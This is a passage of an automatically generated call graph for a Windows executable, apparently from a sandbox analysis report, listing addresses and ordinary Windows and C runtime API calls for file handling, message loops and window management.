4020a3 86695 428bc6 86692->86695 86902 40e830 53 API calls 86692->86902 86701 401a10 52 API calls 86693->86701 86697 401a10 52 API calls 86694->86697 86700 402073 _wcscpy 86696->86700 86698 428b88 86697->86698 86698->86693 86704 401a10 52 API calls 86700->86704 86710 4020d0 86701->86710 86702 4020bb 86903 40cf00 53 API calls 86702->86903 86704->86706 86705 4020c6 86707 408f40 VariantClear 86705->86707 86706->86692 86706->86693 86707->86710 86708 402110 86712 408f40 VariantClear 86708->86712 86710->86708 86713 401a10 52 API calls 86710->86713 86904 40cf00 53 API calls 86710->86904 86905 40e6a0 53 API calls 86710->86905 86714 402120 moneypunct 86712->86714 86713->86710 86714->86559 86716 4295c9 __crtGetStringTypeA_stat 86715->86716 86717 40f53c 86715->86717 86719 4295d9 GetOpenFileNameW 86716->86719 87584 410120 86717->87584 86719->86717 86721 40d5f5 86719->86721 86720 40f545 87588 4102b0 SHGetMalloc 86720->87588 86721->86567 86721->86569 86723 40f54c 87593 410190 GetFullPathNameW 86723->87593 86725 40f559 87604 40f570 86725->87604 87660 402400 86727->87660 86729 40146f 86732 428c29 _wcscat 86729->86732 87669 401500 86729->87669 86731 40147c 86731->86732 87677 40d440 86731->87677 86734 401489 86734->86732 86735 401491 GetFullPathNameW 86734->86735 86736 402160 52 API calls 86735->86736 86737 4014bb 86736->86737 86738 402160 52 API calls 86737->86738 86739 4014c8 86738->86739 86739->86732 86740 402160 52 API calls 86739->86740 86741 4014ee 86740->86741 86741->86569 86743 428361 86742->86743 86744 4103fc LoadImageW RegisterClassExW 86742->86744 87748 44395e EnumResourceNamesW LoadImageW 86743->87748 87747 410490 7 API calls 86744->87747 86747 40d651 86749 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86747->86749 86748 428368 86749->86583 86751 409202 86750->86751 86752 42d7ad 86750->86752 86808 409216 moneypunct 86751->86808 87885 410940 336 API calls 86751->87885 87888 45e737 90 API calls 3 library calls 86752->87888 86755 409386 86756 40939c 86755->86756 87886 40f190 10 API calls 86755->87886 86756->86586 86817 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86756->86817 86758 4095b2 86758->86756 86760 4095bf 86758->86760 86759 409253 PeekMessageW 86759->86808 87887 401a50 336 API calls 86760->87887 86762 42d8cd Sleep 86762->86808 86763 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86763->86756 86766 4095f9 86763->86766 86765 42e13b 87906 40d410 VariantClear 86765->87906 86769 42e158 TranslateMessage DispatchMessageW GetMessageW 86766->86769 86769->86769 86770 42e188 86769->86770 86770->86756 86772 409567 PeekMessageW 86772->86808 86774 46f3c1 107 API calls 86774->86808 86775 40e0a0 52 API calls 86775->86808 86776 46fdbf 108 API calls 86815 4094e0 86776->86815 86777 42dcd2 WaitForSingleObject 86781 42dcf0 GetExitCodeProcess CloseHandle 86777->86781 86777->86808 86778 409551 TranslateMessage DispatchMessageW 86778->86772 86780 42dd3d Sleep 86780->86815 87895 40d410 VariantClear 86781->87895 86783 44c29d 52 API calls 86783->86815 86785 4094cf Sleep 86785->86815 86787 40d410 VariantClear 86787->86808 86789 42d94d timeGetTime 87891 465124 53 API calls 86789->87891 86791 40c620 timeGetTime 86791->86815 86794 42dd89 CloseHandle 86794->86815 86795 47d33e 314 API calls 86795->86808 86797 465124 53 API calls 86797->86815 86798 42de19 GetExitCodeProcess CloseHandle 86798->86815 86801 42de88 Sleep 86801->86808 86804 45e737 90 API calls 86804->86808 86807 42e0cc VariantClear 86807->86808 86808->86755 86808->86759 86808->86762 86808->86765 86808->86772 86808->86774 86808->86775 86808->86777 86808->86778 86808->86780 86808->86785 86808->86787 86808->86789 86808->86795 86808->86804 86808->86807 86809 408f40 VariantClear 86808->86809 86808->86815 87749 4091b0 86808->87749 87807 40afa0 86808->87807 87833 408fc0 86808->87833 87868 408cc0 86808->87868 87882 4096a0 336 API calls 4 library calls 86808->87882 87883 40d150 TranslateAcceleratorW 86808->87883 87884 40d170 IsDialogMessageW GetClassLongW 86808->87884 87889 465124 53 API calls 86808->87889 87890 40c620 timeGetTime 86808->87890 87905 40e270 VariantClear moneypunct 86808->87905 86809->86808 86810 401b10 52 API calls 86810->86815 86812 401980 53 API calls 86812->86815 86813 408f40 VariantClear 86813->86815 86815->86776 86815->86783 86815->86791 86815->86794 86815->86797 86815->86798 86815->86801 86815->86808 86815->86810 86815->86812 86815->86813 87892 45178a 54 API calls 86815->87892 87893 47d33e 336 API calls 86815->87893 87894 453bc6 54 API calls 86815->87894 87896 40d410 VariantClear 86815->87896 87897 443d19 67 API calls _wcslen 86815->87897 87898 4574b4 VariantClear 86815->87898 87899 403cd0 86815->87899 87903 4731e1 VariantClear 86815->87903 87904 4331a2 6 API calls 86815->87904 86816->86582 86817->86586 86818->86569 86819->86575 86821 401b16 _wcslen 86820->86821 86822 401b63 86821->86822 86823 4115d7 52 API calls 86821->86823 86826 40d200 52 API calls 2 library calls 86822->86826 86824 401b4b _memmove 86823->86824 86825 4115d7 52 API calls 86824->86825 86825->86822 86826->86591 86827->86594 86829 40bc70 52 API calls 86828->86829 86830 401f31 86829->86830 86831 402560 86830->86831 86832 40256d __write_nolock 86831->86832 86833 402160 52 API calls 86832->86833 86835 402593 86833->86835 86844 4025bd 86835->86844 86906 401c90 86835->86906 86836 4026f0 52 API calls 86836->86844 86837 4026a7 86838 401b10 52 API calls 86837->86838 86843 4026db 86837->86843 86840 4026d1 86838->86840 86839 401b10 52 API calls 86839->86844 86910 40d7c0 52 API calls 2 library calls 86840->86910 86843->86649 86844->86836 86844->86837 86844->86839 86845 401c90 52 API calls 86844->86845 86909 40d7c0 52 API calls 2 library calls 86844->86909 86845->86844 86911 40f760 86846->86911 86849 410118 86849->86651 86851 42805d 86852 42806a 86851->86852 86967 431e58 86851->86967 86853 413748 _free 46 API calls 86852->86853 86855 428078 86853->86855 86856 431e58 82 API calls 86855->86856 86857 428084 86856->86857 86857->86651 86859 4115d7 52 API calls 86858->86859 86860 401f74 86859->86860 86860->86654 86862 4019a3 86861->86862 86863 401985 86861->86863 86862->86863 86864 4019b8 86862->86864 86866 40199f 86863->86866 87572 403e10 53 API calls 86863->87572 87573 403e10 53 API calls 86864->87573 86866->86657 86868 4019c4 86868->86657 86870 40c2c7 86869->86870 86871 40c30e 86869->86871 86874 40c2d3 86870->86874 86882 426c79 86870->86882 86872 40c315 86871->86872 86873 426c2b 86871->86873 86875 40c321 86872->86875 86881 426c5a 86872->86881 86877 426c4b 86873->86877 86878 426c2e 86873->86878 87574 403ea0 52 API calls __cinit 86874->87574 87575 403ea0 52 API calls __cinit 86875->87575 87577 4534e3 52 API calls 86877->87577 86886 40c2de 86878->86886 87576 4534e3 52 API calls 86878->87576 87578 4534e3 52 API calls 86881->87578 87579 4534e3 52 API calls 86882->87579 86886->86667 86886->86886 86888 401a30 86887->86888 86889 401a17 86887->86889 86890 402160 52 API calls 86888->86890 86891 401a2d 86889->86891 87580 403c30 52 API calls _memmove 86889->87580 86892 401a3d 86890->86892 86891->86671 86892->86671 86895 411523 86894->86895 86896 4114ba 86894->86896 87583 4113a8 58 API calls 3 library calls 86895->87583 86901 40200c 86896->86901 87581 417f77 46 API calls __getptd_noexit 86896->87581 86899 4114c6 87582 417f25 10 API calls wcstoxq 86899->87582 86901->86674 86901->86675 86902->86702 86903->86705 86904->86710 86905->86710 86907 4026f0 52 API calls 86906->86907 86908 401c97 86907->86908 86908->86835 86909->86844 86910->86843 86971 40f6f0 86911->86971 86913 40f77b _strcat moneypunct 86979 40f850 86913->86979 86918 427c2a 87008 414d04 86918->87008 86920 40f7fc 86920->86918 86921 40f804 86920->86921 86995 414a46 86921->86995 86925 40f80e 86925->86849 86930 4528bd 86925->86930 86927 427c59 87014 414fe2 86927->87014 86929 427c79 86931 4150d1 _fseek 81 API calls 86930->86931 86932 452930 86931->86932 87514 452719 86932->87514 86935 452948 86935->86851 86936 414d04 __fread_nolock 61 API calls 86937 452966 86936->86937 86938 414d04 __fread_nolock 61 API calls 86937->86938 86939 452976 86938->86939 86940 414d04 __fread_nolock 61 API calls 86939->86940 86941 45298f 86940->86941 86942 414d04 __fread_nolock 61 API calls 86941->86942 86943 4529aa 86942->86943 86944 4150d1 _fseek 81 API calls 86943->86944 86945 4529c4 86944->86945 86946 4135bb _malloc 46 API calls 86945->86946 86947 4529cf 86946->86947 86948 4135bb _malloc 46 API calls 86947->86948 86949 4529db 86948->86949 86950 414d04 __fread_nolock 61 API calls 86949->86950 86951 4529ec 86950->86951 86952 44afef GetSystemTimeAsFileTime 86951->86952 86953 452a00 86952->86953 86954 452a36 86953->86954 86955 452a13 86953->86955 86956 452aa5 86954->86956 86957 452a3c 86954->86957 86958 413748 _free 46 API calls 86955->86958 86960 413748 _free 46 API calls 86956->86960 87520 44b1a9 86957->87520 86961 452a1c 86958->86961 86963 452aa3 86960->86963 86964 413748 _free 46 API calls 86961->86964 86962 452a9d 86965 413748 _free 46 API calls 86962->86965 86963->86851 86966 452a25 86964->86966 86965->86963 86966->86851 86968 431e64 86967->86968 86969 431e6a 86967->86969 86970 414a46 __fcloseall 82 API calls 86968->86970 86969->86852 86970->86969 86972 425de2 86971->86972 86973 40f6fc _wcslen 86971->86973 86972->86913 86974 40f710 WideCharToMultiByte 86973->86974 86975 40f756 86974->86975 86976 40f728 86974->86976 86975->86913 86977 4115d7 52 API calls 86976->86977 86978 40f735 WideCharToMultiByte 86977->86978 86978->86913 86981 40f85d __crtGetStringTypeA_stat _strlen 86979->86981 86982 40f7ab 86981->86982 87027 414db8 86981->87027 86983 4149c2 86982->86983 87042 414904 86983->87042 86985 40f7e9 86985->86918 86986 40f5c0 86985->86986 86991 40f5cd _strcat __write_nolock _memmove 86986->86991 86987 414d04 __fread_nolock 61 API calls 86987->86991 86989 425d11 86990 4150d1 _fseek 81 API calls 86989->86990 86992 425d33 86990->86992 86991->86987 86991->86989 86994 40f691 __tzset_nolock 86991->86994 87130 4150d1 86991->87130 86993 414d04 __fread_nolock 61 API calls 86992->86993 86993->86994 86994->86920 86996 414a52 __fcloseall 86995->86996 86997 414a64 86996->86997 86998 414a79 86996->86998 87270 417f77 46 API calls __getptd_noexit 86997->87270 87000 415471 __lock_file 47 API calls 86998->87000 87005 414a74 __fcloseall 86998->87005 87002 414a92 87000->87002 87001 414a69 87271 417f25 10 API calls wcstoxq 87001->87271 87254 4149d9 87002->87254 87005->86925 87339 414c76 87008->87339 87010 414d1c 87011 44afef 87010->87011 87507 442c5a 87011->87507 87013 44b00d 87013->86927 87015 414fee __fcloseall 87014->87015 87016 414ffa 87015->87016 87017 41500f 87015->87017 87511 417f77 46 API calls __getptd_noexit 87016->87511 87019 415471 __lock_file 47 API calls 87017->87019 87021 415017 87019->87021 87020 414fff 87512 417f25 10 API calls wcstoxq 87020->87512 87023 414e4e __ftell_nolock 51 API calls 87021->87023 87024 415024 87023->87024 87513 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87024->87513 87026 41500a __fcloseall 87026->86929 87028 414dd6 87027->87028 87029 414deb 87027->87029 87038 417f77 46 API calls __getptd_noexit 87028->87038 87029->87028 87031 414df2 87029->87031 87040 41b91b 79 API calls 11 library calls 87031->87040 87033 414ddb 87039 417f25 10 API calls wcstoxq 87033->87039 87034 414e18 87036 414de6 87034->87036 87041 418f98 77 API calls 5 library calls 87034->87041 87036->86981 87038->87033 87039->87036 87040->87034 87041->87036 87045 414910 __fcloseall 87042->87045 87043 414923 87098 417f77 46 API calls __getptd_noexit 87043->87098 87045->87043 87047 414951 87045->87047 87046 414928 87099 417f25 10 API calls wcstoxq 87046->87099 87061 41d4d1 87047->87061 87050 414956 87051 41496a 87050->87051 87052 41495d 87050->87052 87054 414992 87051->87054 87055 414972 87051->87055 87100 417f77 46 API calls __getptd_noexit 87052->87100 87078 41d218 87054->87078 87101 417f77 46 API calls __getptd_noexit 87055->87101 87057 414933 __fcloseall @_EH4_CallFilterFunc@8 87057->86985 87062 41d4dd __fcloseall 87061->87062 87063 4182cb __lock 46 API calls 87062->87063 87075 41d4eb 87063->87075 87064 41d560 87103 41d5fb 87064->87103 87065 41d567 87067 416b04 __malloc_crt 46 API calls 87065->87067 87069 41d56e 87067->87069 87068 41d5f0 __fcloseall 87068->87050 87069->87064 87070 41d57c InitializeCriticalSectionAndSpinCount 87069->87070 87072 41d59c 87070->87072 87073 41d5af EnterCriticalSection 87070->87073 87076 413748 _free 46 API calls 87072->87076 87073->87064 87074 418209 __mtinitlocknum 46 API calls 87074->87075 87075->87064 87075->87065 87075->87074 87106 4154b2 47 API calls __lock 87075->87106 87107 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87075->87107 87076->87064 87079 41d23a 87078->87079 87080 41d255 87079->87080 87091 41d26c __wopenfile 87079->87091 87112 417f77 46 API calls __getptd_noexit 87080->87112 87082 41d25a 87113 417f25 10 API calls wcstoxq 87082->87113 87083 41d47a 87117 417f77 46 API calls __getptd_noexit 87083->87117 87084 41d48c 87109 422bf9 87084->87109 87088 41d47f 87118 417f25 10 API calls wcstoxq 87088->87118 87089 41499d 87102 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87089->87102 87091->87083 87097 41d421 87091->87097 87114 41341f 58 API calls 2 library calls 87091->87114 87093 41d41a 87093->87097 87115 41341f 58 API calls 2 library calls 87093->87115 87095 41d439 87095->87097 87116 41341f 58 API calls 2 library calls 87095->87116 87097->87083 87097->87084 87098->87046 87099->87057 87100->87057 87101->87057 87102->87057 87108 4181f2 LeaveCriticalSection 87103->87108 87105 41d602 87105->87068 87106->87075 87107->87075 87108->87105 87119 422b35 87109->87119 87111 422c14 87111->87089 87112->87082 87113->87089 87114->87093 87115->87095 87116->87097 87117->87088 87118->87089 87121 422b41 __fcloseall 87119->87121 87120 422b54 87122 417f77 wcstoxq 46 API calls 87120->87122 87121->87120 87123 422b8a 87121->87123 87124 422b59 87122->87124 87125 422400 __tsopen_nolock 109 API calls 87123->87125 87126 417f25 wcstoxq 10 API calls 87124->87126 87127 422ba4 87125->87127 87129 422b63 __fcloseall 87126->87129 87128 422bcb __wsopen_helper LeaveCriticalSection 87127->87128 87128->87129 87129->87111 87133 4150dd __fcloseall 87130->87133 87131 4150e9 87161 417f77 46 API calls __getptd_noexit 87131->87161 87133->87131 87134 41510f 87133->87134 87143 415471 87134->87143 87136 4150ee 87162 417f25 10 API calls wcstoxq 87136->87162 87142 4150f9 __fcloseall 87142->86991 87144 415483 87143->87144 87145 4154a5 EnterCriticalSection 87143->87145 87144->87145 87146 41548b 87144->87146 87147 415117 87145->87147 87148 4182cb __lock 46 API calls 87146->87148 87149 415047 87147->87149 87148->87147 87150 415067 87149->87150 87151 415057 87149->87151 87156 415079 87150->87156 87164 414e4e 87150->87164 87219 417f77 46 API calls __getptd_noexit 87151->87219 87155 41505c 87163 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87155->87163 87181 41443c 87156->87181 87159 4150b9 87194 41e1f4 87159->87194 87161->87136 87162->87142 87163->87142 87165 414e61 87164->87165 87166 414e79 87164->87166 87220 417f77 46 API calls __getptd_noexit 87165->87220 87168 414139 __flswbuf 46 API calls 87166->87168 87170 414e80 87168->87170 87169 414e66 87221 417f25 10 API calls wcstoxq 87169->87221 87172 41e1f4 __write 51 API calls 87170->87172 87173 414e97 87172->87173 87174 414f09 87173->87174 87176 414ec9 87173->87176 87180 414e71 87173->87180 87222 417f77 46 API calls __getptd_noexit 87174->87222 87177 41e1f4 __write 51 API calls 87176->87177 87176->87180 87178 414f64 87177->87178 87179 41e1f4 __write 51 API calls 87178->87179 87178->87180 87179->87180 87180->87156 87182 414477 87181->87182 87183 414455 87181->87183 87187 414139 87182->87187 87183->87182 87184 414139 __flswbuf 46 API calls 87183->87184 87185 414470 87184->87185 87223 41b7b2 77 API calls 6 library calls 87185->87223 87188 414145 87187->87188 87189 41415a 87187->87189 87224 417f77 46 API calls __getptd_noexit 87188->87224 87189->87159 87191 41414a 87225 417f25 10 API calls wcstoxq 87191->87225 87193 414155 87193->87159 87195 41e200 __fcloseall 87194->87195 87196 41e223 87195->87196 87197 41e208 87195->87197 87199 41e22f 87196->87199 87203 41e269 87196->87203 87246 417f8a 46 API calls __getptd_noexit 87197->87246 87248 417f8a 46 API calls __getptd_noexit 87199->87248 87200 41e20d 87247 417f77 46 API calls __getptd_noexit 87200->87247 87202 41e234 87249 417f77 46 API calls __getptd_noexit 87202->87249 87226 41ae56 87203->87226 87207 41e23c 87250 417f25 10 API calls wcstoxq 87207->87250 87208 41e26f 87210 41e291 87208->87210 87211 41e27d 87208->87211 87251 417f77 46 API calls __getptd_noexit 87210->87251 87236 41e17f 87211->87236 87212 41e215 __fcloseall 87212->87155 87215 41e289 87253 41e2c0 LeaveCriticalSection __unlock_fhandle 87215->87253 87216 41e296 87252 417f8a 46 API calls __getptd_noexit 87216->87252 87219->87155 87220->87169 87221->87180 87222->87180 87223->87182 87224->87191 87225->87193 87227 41ae62 __fcloseall 87226->87227 87228 41aebc 87227->87228 87231 4182cb __lock 46 API calls 87227->87231 87229 41aec1 EnterCriticalSection 87228->87229 87230 41aede __fcloseall 87228->87230 87229->87230 87230->87208 87232 41ae8e 87231->87232 87233 41ae97 InitializeCriticalSectionAndSpinCount 87232->87233 87234 41aeaa 87232->87234 87233->87234 87235 41aeec ___lock_fhandle LeaveCriticalSection 87234->87235 87235->87228 87237 41aded __lseek_nolock 46 API calls 87236->87237 87238 41e18e 87237->87238 87239 41e1a4 SetFilePointer 87238->87239 87240 41e194 87238->87240 87242 41e1c3 87239->87242 87243 41e1bb GetLastError 87239->87243 87241 417f77 wcstoxq 46 API calls 87240->87241 87244 41e199 87241->87244 87242->87244 87245 417f9d __dosmaperr 46 API calls 87242->87245 87243->87242 87244->87215 87245->87244 87246->87200 87247->87212 87248->87202 87249->87207 87250->87212 87251->87216 87252->87215 87253->87212 87255 4149ea 87254->87255 87256 4149fe 87254->87256 87300 417f77 46 API calls __getptd_noexit 87255->87300 87257 4149fa 87256->87257 87259 41443c __flush 77 API calls 87256->87259 87272 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87257->87272 87261 414a0a 87259->87261 87260 4149ef 87301 417f25 10 API calls wcstoxq 87260->87301 87273 41d8c2 87261->87273 87265 414139 __flswbuf 46 API calls 87266 414a18 87265->87266 87277 41d7fe 87266->87277 87268 414a1e 87268->87257 87269 413748 _free 46 API calls 87268->87269 87269->87257 87270->87001 87271->87005 87272->87005 87274 41d8d2 87273->87274 87276 414a12 87273->87276 87275 413748 _free 46 API calls 87274->87275 87274->87276 87275->87276 87276->87265 87278 41d80a __fcloseall 87277->87278 87279 41d812 87278->87279 87280 41d82d 87278->87280 87317 417f8a 46 API calls __getptd_noexit 87279->87317 87281 41d839 87280->87281 87286 41d873 87280->87286 87319 417f8a 46 API calls __getptd_noexit 87281->87319 87284 41d817 87318 417f77 46 API calls __getptd_noexit 87284->87318 87285 41d83e 87320 417f77 46 API calls __getptd_noexit 87285->87320 87289 41ae56 ___lock_fhandle 48 API calls 87286->87289 87291 41d879 87289->87291 87290 41d846 87321 417f25 10 API calls wcstoxq 87290->87321 87293 41d893 87291->87293 87294 41d887 87291->87294 87322 417f77 46 API calls __getptd_noexit 87293->87322 87302 41d762 87294->87302 87297 41d88d 87323 41d8ba LeaveCriticalSection __unlock_fhandle 87297->87323 87298 41d81f __fcloseall 87298->87268 87300->87260 87301->87257 87324 41aded 87302->87324 87304 41d7c8 87337 41ad67 47 API calls 2 library calls 87304->87337 87306 41d772 87306->87304 87307 41d7a6 87306->87307 87309 41aded __lseek_nolock 46 API calls 87306->87309 87307->87304 87310 41aded __lseek_nolock 46 API calls 87307->87310 87308 41d7d0 87312 41d7f2 87308->87312 87338 417f9d 46 API calls 3 library calls 87308->87338 87313 41d79d 87309->87313 87311 41d7b2 CloseHandle 87310->87311 87311->87304 87314 41d7be GetLastError 87311->87314 87312->87297 87316 41aded __lseek_nolock 46 API calls 87313->87316 87314->87304 87316->87307 87317->87284 87318->87298 87319->87285 87320->87290 87321->87298 87322->87297 87323->87298 87325 41ae12 87324->87325 87326 41adfa 87324->87326 87328 417f8a __close 46 API calls 87325->87328 87331 41ae51 87325->87331 87327 417f8a __close 46 API calls 87326->87327 87329 41adff 87327->87329 87330 41ae23 87328->87330 87332 417f77 wcstoxq 46 API calls 87329->87332 87333 417f77 wcstoxq 46 API calls 87330->87333 87331->87306 87334 41ae07 87332->87334 87335 41ae2b 87333->87335 87334->87306 87336 417f25 wcstoxq 10 API calls 87335->87336 87336->87334 87337->87308 87338->87312 87340 414c82 __fcloseall 87339->87340 87341 414cc3 87340->87341 87342 414c96 __crtGetStringTypeA_stat 87340->87342 87343 414cbb __fcloseall 87340->87343 87344 415471 __lock_file 47 API calls 87341->87344 87366 417f77 46 API calls __getptd_noexit 87342->87366 87343->87010 87346 414ccb 87344->87346 87352 414aba 87346->87352 87348 414cb0 87367 417f25 10 API calls wcstoxq 87348->87367 87356 414ad8 __crtGetStringTypeA_stat 87352->87356 87359 414af2 87352->87359 87353 414ae2 87419 417f77 46 API calls __getptd_noexit 87353->87419 87355 414b2d 87355->87359 87360 414c38 __crtGetStringTypeA_stat 87355->87360 87361 414139 __flswbuf 46 API calls 87355->87361 87369 41dfcc 87355->87369 87399 41d8f3 87355->87399 87421 41e0c2 46 API calls 3 library calls 87355->87421 87356->87353 87356->87355 87356->87359 87368 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87359->87368 87422 417f77 46 API calls __getptd_noexit 87360->87422 87361->87355 87365 414ae7 87420 417f25 10 API calls wcstoxq 87365->87420 87366->87348 87367->87343 87368->87343 87370 41dfd8 __fcloseall 87369->87370 87371 41dfe0 87370->87371 87372 41dffb 87370->87372 87492 417f8a 46 API calls __getptd_noexit 87371->87492 87374 41e007 87372->87374 87377 41e041 87372->87377 87494 417f8a 46 API calls __getptd_noexit 87374->87494 87375 41dfe5 87493 417f77 46 API calls __getptd_noexit 87375->87493 87380 41e063 87377->87380 87381 41e04e 87377->87381 87379 41e00c 87495 417f77 46 API calls __getptd_noexit 87379->87495 87384 41ae56 ___lock_fhandle 48 API calls 87380->87384 87497 417f8a 46 API calls __getptd_noexit 87381->87497 87387 41e069 87384->87387 87385 41e014 87496 417f25 10 API calls wcstoxq 87385->87496 87386 41e053 87498 417f77 46 API calls __getptd_noexit 87386->87498 87390 41e077 87387->87390 87391 41e08b 87387->87391 87389 41dfed __fcloseall 87389->87355 87423 41da15 87390->87423 87499 417f77 46 API calls __getptd_noexit 87391->87499 87395 41e090 87500 417f8a 46 API calls __getptd_noexit 87395->87500 87396 41e083 87501 41e0ba LeaveCriticalSection __unlock_fhandle 87396->87501 87400 41d900 87399->87400 87403 41d915 87399->87403 87505 417f77 46 API calls __getptd_noexit 87400->87505 87402 41d905 87506 417f25 10 API calls wcstoxq 87402->87506 87405 41d94a 87403->87405 87410 41d910 87403->87410 87502 420603 87403->87502 87407 414139 __flswbuf 46 API calls 87405->87407 87408 41d95e 87407->87408 87409 41dfcc __read 59 API calls 87408->87409 87411 41d965 87409->87411 87410->87355 87411->87410 87412 414139 __flswbuf 46 API calls 87411->87412 87413 41d988 87412->87413 87413->87410 87414 414139 __flswbuf 46 API calls 87413->87414 87415 41d994 87414->87415 87415->87410 87416 414139 __flswbuf 46 API calls 87415->87416 87417 41d9a1 87416->87417 87418 414139 __flswbuf 46 API calls 87417->87418 87418->87410 87419->87365 87420->87359 87421->87355 87422->87365 87424 41da31 87423->87424 87425 41da4c 87423->87425 87427 417f8a __close 46 API calls 87424->87427 87426 41da5b 87425->87426 87428 41da7a 87425->87428 87429 417f8a __close 46 API calls 87426->87429 87430 41da36 87427->87430 87432 41da98 87428->87432 87443 41daac 87428->87443 87431 41da60 87429->87431 87433 417f77 wcstoxq 46 API calls 87430->87433 87434 417f77 wcstoxq 46 API calls 87431->87434 87435 417f8a __close 46 API calls 87432->87435 87444 41da3e 87433->87444 87437 41da67 87434->87437 87439 41da9d 87435->87439 87436 41db02 87438 417f8a __close 46 API calls 87436->87438 87440 417f25 wcstoxq 10 API calls 87437->87440 87441 41db07 87438->87441 87442 417f77 wcstoxq 46 API calls 87439->87442 87440->87444 87445 417f77 wcstoxq 46 API calls 87441->87445 87446 41daa4 87442->87446 87443->87436 87443->87444 87447 41dae1 87443->87447 87448 41db1b 87443->87448 87444->87396 87445->87446 87449 417f25 wcstoxq 10 API calls 87446->87449 87447->87436 87452 41daec ReadFile 87447->87452 87450 416b04 __malloc_crt 46 API calls 87448->87450 87449->87444 87453 41db31 87450->87453 87454 41dc17 87452->87454 87455 41df8f GetLastError 87452->87455 87458 41db59 87453->87458 87459 41db3b 87453->87459 87454->87455 87462 41dc2b 87454->87462 87456 41de16 87455->87456 87457 41df9c 87455->87457 87466 417f9d __dosmaperr 46 API calls 87456->87466 87471 41dd9b 87456->87471 87460 417f77 wcstoxq 46 API calls 87457->87460 87463 420494 __lseeki64_nolock 48 API calls 87458->87463 87461 417f77 wcstoxq 46 API calls 87459->87461 87464 41dfa1 87460->87464 87465 41db40 87461->87465 87462->87471 87472 41dc47 87462->87472 87475 41de5b 87462->87475 87467 41db67 87463->87467 87468 417f8a __close 46 API calls 87464->87468 87469 417f8a __close 46 API calls 87465->87469 87466->87471 87467->87452 87468->87471 87469->87444 87470 413748 _free 46 API calls 87470->87444 87471->87444 87471->87470 87473 41dcab ReadFile 87472->87473 87480 41dd28 87472->87480 87477 41dcc9 GetLastError 87473->87477 87483 41dcd3 87473->87483 87474 41ded0 ReadFile 87478 41deef GetLastError 87474->87478 87484 41def9 87474->87484 87475->87471 87475->87474 87476 41ddec MultiByteToWideChar 87476->87471 87479 41de10 GetLastError 87476->87479 87477->87472 87477->87483 87478->87475 87478->87484 87479->87456 87480->87471 87481 41dda3 87480->87481 87482 41dd96 87480->87482 87488 41dd60 87480->87488 87481->87488 87489 41ddda 87481->87489 87485 417f77 wcstoxq 46 API calls 87482->87485 87483->87472 87486 420494 __lseeki64_nolock 48 API calls 87483->87486 87484->87475 87487 420494 __lseeki64_nolock 48 API calls 87484->87487 87485->87471 87486->87483 87487->87484 87488->87476 87490 420494 __lseeki64_nolock 48 API calls 87489->87490 87491 41dde9 87490->87491 87491->87476 87492->87375 87493->87389 87494->87379 87495->87385 87496->87389 87497->87386 87498->87385 87499->87395 87500->87396 87501->87389 87503 416b04 __malloc_crt 46 API calls 87502->87503 87504 420618 87503->87504 87504->87405 87505->87402 87506->87410 87510 4148b3 GetSystemTimeAsFileTime __aulldiv 87507->87510 87509 442c6b 87509->87013 87510->87509 87511->87020 87512->87026 87513->87026 87519 45272f __tzset_nolock _wcscpy 87514->87519 87515 414d04 61 API calls __fread_nolock 87515->87519 87516 44afef GetSystemTimeAsFileTime 87516->87519 87517 4528a4 87517->86935 87517->86936 87518 4150d1 81 API calls _fseek 87518->87519 87519->87515 87519->87516 87519->87517 87519->87518 87521 44b1bc 87520->87521 87522 44b1ca 87520->87522 87523 4149c2 116 API calls 87521->87523 87524 44b1e1 87522->87524 87525 4149c2 116 API calls 87522->87525 87526 44b1d8 87522->87526 87523->87522 87555 4321a4 87524->87555 87527 44b2db 87525->87527 87526->86962 87527->87524 87529 44b2e9 87527->87529 87531 44b2f6 87529->87531 87535 414a46 __fcloseall 82 API calls 87529->87535 87530 44b224 87532 44b253 87530->87532 87533 44b228 87530->87533 87531->86962 87559 43213d 87532->87559 87534 44b235 87533->87534 87537 414a46 __fcloseall 82 API calls 87533->87537 87538 44b245 87534->87538 87540 414a46 __fcloseall 82 API calls 87534->87540 87535->87531 87537->87534 87538->86962 87539 44b25a 87541 44b260 87539->87541 87542 44b289 87539->87542 87540->87538 87545 414a46 __fcloseall 82 API calls 87541->87545 87548 44b26d 87541->87548 87569 44b0bf 87 API calls 87542->87569 87544 44b28f 87570 4320f8 46 API calls _free 87544->87570 87545->87548 87546 414a46 __fcloseall 82 API calls 87549 44b27d 87546->87549 87548->87546 87548->87549 87549->86962 87550 44b295 87551 44b2a2 87550->87551 87552 414a46 __fcloseall 82 API calls 87550->87552 87553 44b2b2 87551->87553 87554 414a46 __fcloseall 82 API calls 87551->87554 87552->87551 87553->86962 87554->87553 87556 4321cb 87555->87556 87558 4321b4 __tzset_nolock _memmove 87555->87558 87557 414d04 __fread_nolock 61 API calls 87556->87557 87557->87558 87558->87530 87560 4135bb _malloc 46 API calls 87559->87560 87561 432150 87560->87561 87562 4135bb _malloc 46 API calls 87561->87562 87563 432162 87562->87563 87564 4135bb _malloc 46 API calls 87563->87564 87565 432174 87564->87565 87567 432189 87565->87567 87571 4320f8 46 API calls _free 87565->87571 87567->87539 87568 432198 87568->87539 87569->87544 87570->87550 87571->87568 87572->86866 87573->86868 87574->86886 87575->86886 87576->86886 87577->86881 87578->86886 87579->86886 87580->86891 87581->86899 87582->86901 87583->86901 87633 410160 87584->87633 87586 41012f GetFullPathNameW 87587 410147 moneypunct 87586->87587 87587->86720 87589 4102cb SHGetDesktopFolder 87588->87589 87592 410333 _wcsncpy 87588->87592 87590 4102e0 _wcsncpy 87589->87590 87589->87592 87591 41031c SHGetPathFromIDListW 87590->87591 87590->87592 87591->87592 87592->86723 87594 4101bb 87593->87594 87598 425f4a 87593->87598 87595 410160 52 API calls 87594->87595 87597 4101c7 87595->87597 87596 4114ab __wcsicoll 58 API calls 87596->87598 87637 410200 52 API calls 2 library calls 87597->87637 87598->87596 87601 425f6e 87598->87601 87600 4101d6 87638 410200 52 API calls 2 library calls 87600->87638 87601->86725 87603 4101e9 87603->86725 87605 40f760 128 API calls 87604->87605 87606 40f584 87605->87606 87607 429335 87606->87607 87608 40f58c 87606->87608 87611 4528bd 118 API calls 87607->87611 87609 